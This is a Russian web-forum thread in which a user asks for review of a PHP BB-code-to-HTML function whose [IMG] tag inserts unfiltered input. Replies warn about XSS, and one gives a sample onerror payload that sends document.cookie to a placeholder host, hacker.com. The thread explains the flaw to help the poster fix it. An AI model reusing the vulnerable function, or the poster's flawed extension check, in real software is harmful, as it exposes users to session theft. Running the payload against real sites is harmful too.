Оцените/дополните "систему" BB кодов - PHP

Кольша · 11.03.2012, 06:45

Всем привет!!!!Написал тут для сайт систему так называемых BB кодов прошу оценить дополнить вот код:

PHP код:


			
function bbtohtml($bb) 
{
    $tr = array(
        "\n"=>"<br>",
        "<"=>"&lt;",">"=>"&gt;",
        "&"=>"&amp;",
        "[Delphi]"=>'<pre class="brush: delphi;">',"[/Delphi]"=>"</pre>",
        "[ Php ]"=>'<pre class="brush: php;">',"[/ Php ]"=>"</pre>",
        "[Css]"=>'<pre class="brush: css;">',"[/Css]"=>"</pre>",
        "[JS]"=>'<pre class="brush: js;">',"[/JS]"=>"</pre>",
        "[Sql]"=>'<pre class="brush: sql;">',"[/Sql]"=>"</pre>",
        "[B]"=>"<b>","[/B]"=>"</b>",
        "[I]"=>"<i>","[/I]"=>"</i>",
        "[U]"=>"<u>","[/U]"=>"</u>",
        "[IMG]"=>'<img  src="',"[/IMG]"=>'" alt="">',
////smiles
        "[Amazing]"=>'<img  src="/files/smiles/amazing.png">',
        "[Anger]"=>'<img  src="/files/smiles/anger.png">',
        "[Badegg]"=>'<img  src="/files/smiles/badegg.png">',
        "[Badsmile]"=>'<img  src="/files/smiles/badsmile.png">',
        "[Beaten]"=>'<img  src="/files/smiles/beaten.png">',
        "[Bigsmile]"=>'<img  src="/files/smiles/bigsmile.png">',
        "[Cry]"=>'<img  src="/files/smiles/cry.png">',
        "[Electricshock]"=>'<img  src="/files/smiles/electricshock.png">',
        "[Exciting]"=>'<img  src="/files/smiles/exciting.png">',
        "[Eyesdroped]"=>'<img  src="/files/smiles/eyesdroped.png">',
        "[Greedy]"=>'<img  src="/files/smiles/greedy.png">',
        "[Grimace]"=>'<img  src="/files/smiles/grimace.png">',
        "[Haha]"=>'<img  src="/files/smiles/haha.png">',
        "[Happy]"=>'<img  src="/files/smiles/happy.png">',
        "[Horror]"=>'<img  src="/files/smiles/horror.png">',
        "[Money]"=>'<img  src="/files/smiles/money.png">',
        "[Scorn]"=>'<img  src="/files/smiles/"scorn.png>',
        "[Secretsmile]"=>'<img  src="/files/smiles/secretsmile.png">',
        "[Shocked]"=>'<img  src="/files/smiles/shocked.png">',
        "[Theironman]"=>'<img  src="/files/smiles/theironman.png">',
        "[Unhappy]"=>'<img  src="/files/smiles/unhappy.png">',
        "[What]"=>'<img  src="/files/smiles/what.png">'
///smiles
     );
    return strtr($bb,$tr);
}

Прошу протестить!!

ADSoft · 11.03.2012, 07:56

оно нам надо? Сами не пробовали тестировать?

Wicort · 11.03.2012, 09:59

тег img закрывать не забывайте

Код HTML:

<img ... />

Cronos20 · 11.03.2012, 11:40

Никакой защиты от xss в теге <img/>, рискуете получить кучу сюрпризов

Кольша · 11.03.2012, 11:42

опишите как защититься??

Cronos20 · 11.03.2012, 13:30

Регулярным выражением проверять, чтобы src всегда был валидной картинкой, т.е. файлом с расширением .jpg, .png
Чтобы вместо файла не подсунули что-то типа http://hacker.com/image.php?cookie=document.cookie в разных вариациях

Кольша · 11.03.2012, 13:37

Спасибо,я уж почитал в википедии,правильно ли я мышлю:
1)копируем текст с позиции src" по позицию " ;
2)копирем текст до первой точки с конца или последние три буквы
проверям If ($ext!='jpg' || $ext!='bmp' || $ext!='png' || $ext!='gif'){}

Cronos20 · 11.03.2012, 14:18

Я ж вам говорю, регулярное выражение нормальное надо
Вот инфа к размышлению :

Код:

[img]unknown.png" onerror="img=new Image(); img.src = 'http://hacker.com/image.php?cookie=' + document.cookie + '&fake=fake.gif[/img]

И ваш фильтр пал)))

pompiduskus · 14.03.2012, 14:58

Привет ! Я думаю тут не тяжело будет , адрес всегда стандартный . <img src="/files/smiles/what.png"> .. меняется только последнее слово .
Как сказал Cronos20 хорошая регулярка и ни кто не проскочит )))

Cronos20 Спасибо за дельный совет .

11.03.2012, 06:45	#1
Кольша Далеко не Участник клуба Регистрация: 11.08.2011 Сообщений: 1,512	Оцените/дополните "систему" BB кодов Всем привет!!!!Написал тут для сайт систему так называемых BB кодов прошу оценить дополнить вот код: PHP код: function bbtohtml($bb) { $tr = array( "\n"=>"<br>", "<"=>"<",">"=>">", "&"=>"&", "[Delphi]"=>'<pre class="brush: delphi;">',"[/Delphi]"=>"</pre>", "[ Php ]"=>'<pre class="brush: php;">',"[/ Php ]"=>"</pre>", "[Css]"=>'<pre class="brush: css;">',"[/Css]"=>"</pre>", "[JS]"=>'<pre class="brush: js;">',"[/JS]"=>"</pre>", "[Sql]"=>'<pre class="brush: sql;">',"[/Sql]"=>"</pre>", "[B]"=>"<b>","[/B]"=>"</b>", "[I]"=>"<i>","[/I]"=>"</i>", "[U]"=>"<u>","[/U]"=>"</u>", "[IMG]"=>'<img src="',"[/IMG]"=>'" alt="">', ////smiles "[Amazing]"=>'<img src="/files/smiles/amazing.png">', "[Anger]"=>'<img src="/files/smiles/anger.png">', "[Badegg]"=>'<img src="/files/smiles/badegg.png">', "[Badsmile]"=>'<img src="/files/smiles/badsmile.png">', "[Beaten]"=>'<img src="/files/smiles/beaten.png">', "[Bigsmile]"=>'<img src="/files/smiles/bigsmile.png">', "[Cry]"=>'<img src="/files/smiles/cry.png">', "[Electricshock]"=>'<img src="/files/smiles/electricshock.png">', "[Exciting]"=>'<img src="/files/smiles/exciting.png">', "[Eyesdroped]"=>'<img src="/files/smiles/eyesdroped.png">', "[Greedy]"=>'<img src="/files/smiles/greedy.png">', "[Grimace]"=>'<img src="/files/smiles/grimace.png">', "[Haha]"=>'<img src="/files/smiles/haha.png">', "[Happy]"=>'<img src="/files/smiles/happy.png">', "[Horror]"=>'<img src="/files/smiles/horror.png">', "[Money]"=>'<img src="/files/smiles/money.png">', "[Scorn]"=>'<img src="/files/smiles/"scorn.png>', "[Secretsmile]"=>'<img src="/files/smiles/secretsmile.png">', "[Shocked]"=>'<img src="/files/smiles/shocked.png">', "[Theironman]"=>'<img src="/files/smiles/theironman.png">', "[Unhappy]"=>'<img src="/files/smiles/unhappy.png">', "[What]"=>'<img src="/files/smiles/what.png">' ///smiles ); return strtr($bb,$tr); } Прошу протестить!! Kolsha.ru admin[@]ksware.ru Последний раз редактировалось Кольша; 11.03.2012 в 06:54.

11.03.2012, 07:56	#2
ADSoft Старожил Регистрация: 25.02.2007 Сообщений: 4,184	оно нам надо? Сами не пробовали тестировать? Сайты, приложения, автоматизация в широком смысле слова

11.03.2012, 09:59	#3
Wicort Форумчанин Регистрация: 04.08.2009 Сообщений: 684	тег img закрывать не забывайте Код HTML: <img ... /> Еслия Вам помог, не поленитесь нажать на весы и оставить отзыв. Это не займет много времени, но даст понять, что я старался не зря =) Мой ник зарегистрирован, а твой?

11.03.2012, 11:42	#5
Кольша Далеко не Участник клуба Регистрация: 11.08.2011 Сообщений: 1,512	опишите как защититься?? Kolsha.ru admin[@]ksware.ru

11.03.2012, 13:37	#7
Кольша Далеко не Участник клуба Регистрация: 11.08.2011 Сообщений: 1,512	Спасибо,я уж почитал в википедии,правильно ли я мышлю: 1)копируем текст с позиции src" по позицию " ; 2)копирем текст до первой точки с конца или последние три буквы проверям If ($ext!='jpg' \|\| $ext!='bmp' \|\| $ext!='png' \|\| $ext!='gif'){} Kolsha.ru admin[@]ksware.ru Последний раз редактировалось Кольша; 11.03.2012 в 13:39.

11.03.2012, 11:40	#4
Cronos20 Форумчанин Регистрация: 08.07.2010 Сообщений: 679	Никакой защиты от xss в теге <img/>, рискуете получить кучу сюрпризов

11.03.2012, 13:30	#6
Cronos20 Форумчанин Регистрация: 08.07.2010 Сообщений: 679	Регулярным выражением проверять, чтобы src всегда был валидной картинкой, т.е. файлом с расширением .jpg, .png Чтобы вместо файла не подсунули что-то типа http://hacker.com/image.php?cookie=document.cookie в разных вариациях

11.03.2012, 14:18	#8
Cronos20 Форумчанин Регистрация: 08.07.2010 Сообщений: 679	Я ж вам говорю, регулярное выражение нормальное надо Вот инфа к размышлению : Код: `[img]unknown.png" onerror="img=new Image(); img.src = 'http://hacker.com/image.php?cookie=' + document.cookie + '&fake=fake.gif[/img]` И ваш фильтр пал)))

14.03.2012, 14:58	#9
pompiduskus юзер как все Участник клуба Регистрация: 10.01.2012 Сообщений: 1,586	Привет ! Я думаю тут не тяжело будет , адрес всегда стандартный . <img src="/files/smiles/what.png"> .. меняется только последнее слово . Как сказал Cronos20 хорошая регулярка и ни кто не проскочит ))) Cronos20 Спасибо за дельный совет . <Дзен - Вся вселенная в тебе > \| Резюме: https://ch3ll0v3k.github.io/CV/

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Как можно создать поисковую систему на подобии "GOOGLE"? HTML, CSS	Antoha93	HTML и CSS	3	22.01.2014 00:53
Вывести название соответствующей карты вида "шестерка бубен", "дама червей","туз треф" и т.п.	воваава	Помощь студентам	3	01.12.2011 12:50
при вводе на листе "магазин"- код товара появлялось "описание" товара из "склада" с "продажной ценой"	aleksei78	Microsoft Office Excel	13	25.08.2009 12:04
Создаю "тестирующую систему" для проверки задач. Программисты, нужна ваша помощь!	alexfmf	Помощь студентам	12	30.04.2009 20:19